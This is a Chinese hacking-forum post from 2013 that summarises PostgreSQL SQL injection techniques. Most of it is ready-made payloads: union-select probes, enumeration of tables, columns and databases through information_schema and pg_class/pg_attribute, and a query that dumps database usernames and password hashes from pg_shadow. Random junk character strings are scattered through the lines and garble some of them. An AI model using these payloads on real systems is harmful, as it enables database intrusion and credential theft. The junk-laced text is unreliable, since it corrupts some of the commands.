找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2251|回复: 0
打印 上一主题 下一主题

postgreSQL注入总结

[复制链接]
抢楼 抢楼 本帖为抢楼帖,欢迎抢楼! 
跳转到指定楼层
楼主
发表于 2013-10-13 12:57:16 | 只看该作者 回帖奖励 |阅读模式
结合了MSSQL MySQL Oracle的一些特点
# |( G. g# g/ h; T  i

支持多语句执行,语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/+ D! ~8 C9 A: H" j: D7 C
连接符: %20 , + , /**/

内置函数:
+ f7 q+ |0 c0 ^current_database() //当前数据库名
& `2 f% _+ b8 e5 Osession_user //会话用户
' _# O5 a4 z3 _  l/ y. rcurrent_user //当前数据库用户+ |, R* F$ q+ I' l
user //当前用户* |1 o' b. ^8 g. H6 A
version() //数据库版本

Union注射:3 M8 ^& r8 L) W, B$ Q, n% A
order by n–
: k8 i; ~' Q: u  H; w" Y- G0 |and 1=2 union select null,null,null–* I7 p, J7 h! ?* x+ x" m! l6 v
and 1=2 union select ‘beach’,null,null–
% I! Q9 @' U+ ~and 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):+ n9 @+ {, A3 a
group_concat(table_name)7 K* `8 M; {: L+ a; N9 v, K: u
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
% {2 |3 i2 O! y( vand 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
# K& ~, R  b" `" o! v2 h(老版本)
" C6 B3 y' a/ n( f* E3 Z( {pg_class.oid对应pg_attribute.attrelid* H, w. ?! l/ j( U& c% ^
pg_class.relname表名
8 `3 R/ [& R, {/ @, C; X0 m1 qpg_attribute.attname字段名

select relname from pg_class获取表名
6 p/ x0 [6 K' e3 }5 p$ wselect oid from pg_class where 条件 获取参数
0 p8 e  y: P. s$ w1 R' w4 q5 Hselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:
, i; Z1 K* g- u( @6 U+ }4 Hand 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表6 a0 T( p+ r% E- O  N
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
( [. G7 i$ H9 ^7 n/ [3 |& @由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名; s3 v. n" G& Q' p) j7 L5 L) A2 e9 K
======================================================================
7 N/ _0 G, p$ {4 u3 Fand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库! {" ^  s* E1 h: h( x
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表